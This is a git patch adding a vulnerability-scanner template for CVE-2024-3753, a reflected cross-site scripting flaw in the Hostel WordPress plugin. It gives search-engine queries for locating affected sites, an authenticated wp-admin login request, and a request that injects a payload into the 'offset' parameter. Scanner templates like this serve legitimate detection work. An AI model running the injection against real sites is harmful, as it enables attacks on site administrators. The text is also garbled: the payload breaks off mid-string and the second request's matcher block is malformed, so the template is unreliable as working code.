From 45a1d3cacbb882ad835a47d3436b0d2e70216f28 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 7 Oct 2024 11:57:06 +0400 Subject: [PATCH] Create CVE-2024-3753.yaml --- http/cves/2024/CVE-2024-3753.yaml | 72 +++++++++++++++++++++++++++++++ 1 file changed, 72 insertions(+) create mode 100644 http/cves/2024/CVE-2024-3753.yaml diff --git a/http/cves/2024/CVE-2024-3753.yaml b/http/cves/2024/CVE-2024-3753.yaml new file mode 100644 index 0000000000..790e7b27cc --- /dev/null +++ b/http/cves/2024/CVE-2024-3753.yaml @@ -0,0 +1,72 @@ +id: CVE-2024-3753 + +info: + name: Hostel < 1.1.5.3 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + The Hostel WordPress plugin before 1.1.5.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. + impact: | + Attackers can potentially exploit this XSS vulnerability to gain unauthorized access to sensitive information. + remediation: | + Update the plugin to Latest version. Fixed in 1.1.5.3. + reference: + - https://wpscan.com/vulnerability/e140e109-4176-4b26-bf63-198262a31409/ + - https://nvd.nist.gov/vuln/detail/CVE-2024-3753 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L + cvss-score: 5.9 + cve-id: CVE-2024-3753 + cwe-id: CWE-79 + epss-score: 0.00043 + epss-percentile: 0.09629 + cpe: cpe:2.3:a:kibokolabs:hostel:*:*:*:*:wordpress:*:*:* + metadata: + max-request: 3 + fofa-query: body="/wp-content/plugins/hostel" + publicwww-query: /wp-content/plugins/hostel/ + shodan-query: http.html:"/wp-content/plugins/hostel/" + tags: cve,cve2024,wp,wordpress,wp-plugin,hostel,xss + +flow: http(1) && http(2) + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + part: body + words: + - "/wp-content/plugins/hostel" + internal: true + + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=wphostel_bookings&do=edit&id=&type=upcoming&offset=">' + + - type: word + part: content_type_2 + words: + - text/html + + - type: status + status: + - 200